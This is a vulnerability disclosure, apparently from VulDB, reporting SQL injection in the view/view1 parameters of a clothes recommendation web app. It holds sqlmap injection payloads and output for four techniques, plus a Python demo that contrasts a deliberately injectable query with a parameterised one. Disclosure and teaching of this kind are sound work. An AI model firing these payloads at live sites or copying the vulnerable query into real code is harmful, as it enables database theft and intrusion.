Submit #427447: SourceCodeHero Clothes Recommendation System - view parameter V1.0 SQL Injection

Title: SourceCodeHero Clothes Recommendation System - view parameter V1.0 SQL Injection

Description:
I would like to report a SQL injection vulnerability I discovered in SourceCodeHero - Clothes Recommendation System during my testing.

Details:
Affected URL/Endpoint: /Online_Shopping/admin/home.php?view=1%20&%20view1=1
Vulnerable Parameter: 'view', 'view1'
Risk Level: High (allows malicious users to execute arbitrary SQL queries)

Steps to reproduce:
1) Login as admin via /online_shopping/admin
2) Navigate to 'View All'
3) Select a category and subcategory
4) Use a proxy like Burp Suite to intercept the request.
5) Input the payload to invoke the SQL injection.

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: view (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: view=1 ' AND 8219=8219-- amBF& view1=1

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: view=1 ' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(6428=6428,1))),0x71706a7a71),6428)-- CRgU& view1=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: view=1 ' AND (SELECT 9251 FROM (SELECT(SLEEP(5)))rdxA)-- kmmr& view1=1

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: view=1 ' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b6271,0x6c476679526269716b6748556857525a67567a7a5178737575795974584f7454694e62525859614b,0x71706a7a71),NULL,NULL-- -& view1=1

Parameter: view1 (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: view=1 & view1=1' AND 8519=8519-- GRrq

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: view=1 & view1=1' AND GTID_SUBSET(CONCAT(0x71766b6271,(SELECT (ELT(5545=5545,1))),0x71706a7a71),5545)-- MWyB

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: view=1 & view1=1' AND (SELECT 1310 FROM (SELECT(SLEEP(5)))lIMf)-- cZqd

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: view=1 & view1=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b6271,0x4f6870744a4650484f446d4a45636d7162694b54765874704a767975656d6f4945415a5264674878,0x71706a7a71)-- -
---
[13:39:49] [INFO] the back-end DBMS is MySQL
[13:39:49] [INFO] fetching banner
web application technology: Apache 2.4.59, PHP 8.2.18
back-end DBMS: MySQL >= 5.6
banner: '8.3.0'

Please let me know if you need further information or a more detailed analysis.
User: Delvy (UID 74555)
Submission: 10/21/2024 07:40 AM (2 months ago)
Moderation: 10/24/2024 12:48 PM (3 days later)
Status: Accepted
VulDB Entry: 281683 [SourceCodeHero Clothes Recommendation System 1.0 /admin/home.php view/view1 sql injection]
Points: 17
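The following is an added, self-contained illustration of the bug class the submission describes; it is not the submitter's code and not code from SourceCodeHero. The real schema and query in home.php are not on the page, so the table, column names and query shape below are assumptions chosen only to make the two sqlmap techniques from the report (boolean-based blind and UNION) reproducible offline against an in-memory SQLite database. The payloads are rewritten for SQLite: the MySQL-only GTID_SUBSET and SLEEP techniques are left out, and the report's 9-column UNION becomes a 1-column one because the stand-in query selects a single column.

```python
import sqlite3

# Constructed stand-in for the application's product table. The real schema
# of SourceCodeHero Clothes Recommendation System is not on the page; these
# rows exist only so the queries below return something checkable.
SAMPLE_ROWS = [
    ("1", "10", "Blue shirt"),
    ("1", "11", "Red shirt"),
    ("2", "10", "Jeans"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (category TEXT, subcategory TEXT, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, view, view1):
    """Hypothetical reconstruction of the bug class behind
    home.php?view=...&view1=...: both GET parameters are pasted into the SQL
    string, so a single quote in either one terminates the literal."""
    sql = (
        "SELECT name FROM products "
        f"WHERE category='{view}' AND subcategory='{view1}'"
    )
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, view, view1):
    """Same lookup with bound parameters: the values never reach the SQL
    parser as SQL, so quotes, comments and UNIONs in them are just text."""
    sql = "SELECT name FROM products WHERE category=? AND subcategory=?"
    return [row[0] for row in conn.execute(sql, (view, view1))]


def boolean_blind_probe(lookup, conn):
    """Replays the boolean-based blind test from the report. sqlmap compares
    the response for a true condition (8219=8219) with one for a false
    condition; if they differ, the injected expression is being evaluated.
    The trailing '-- ' comments out the rest of the original WHERE clause,
    which is why the subcategory filter disappears in the vulnerable case."""
    true_payload = "1' AND 8219=8219-- "
    false_payload = "1' AND 8219=8220-- "
    return lookup(conn, true_payload, "10"), lookup(conn, false_payload, "10")


def union_probe(lookup, conn):
    """Replays the UNION technique from the report. The real target needed a
    9-column SELECT to match the original query; this stand-in query has one
    column, so the UNION appends one. The injected SELECT reads the schema
    catalogue (sqlite_master here, information_schema on MySQL)."""
    payload = "x' UNION ALL SELECT name FROM sqlite_master WHERE type='table'-- "
    return lookup(conn, payload, "10")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, boolean probe:", boolean_blind_probe(lookup_vulnerable, db))
    print("safe, boolean probe:      ", boolean_blind_probe(lookup_safe, db))
    print("vulnerable, union probe:  ", union_probe(lookup_vulnerable, db))
    print("safe, union probe:        ", union_probe(lookup_safe, db))
```

With the concatenating lookup, the true and false payloads return different row sets (the blind oracle sqlmap relies on) and the UNION payload returns the table name from the catalogue; with bound parameters both probes return nothing because the whole payload is matched as a category value. The random token after `--` in the report's payloads (`-- amBF`) is there because MySQL only treats `--` as a comment when it is followed by whitespace; the space in the payloads above serves the same purpose.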
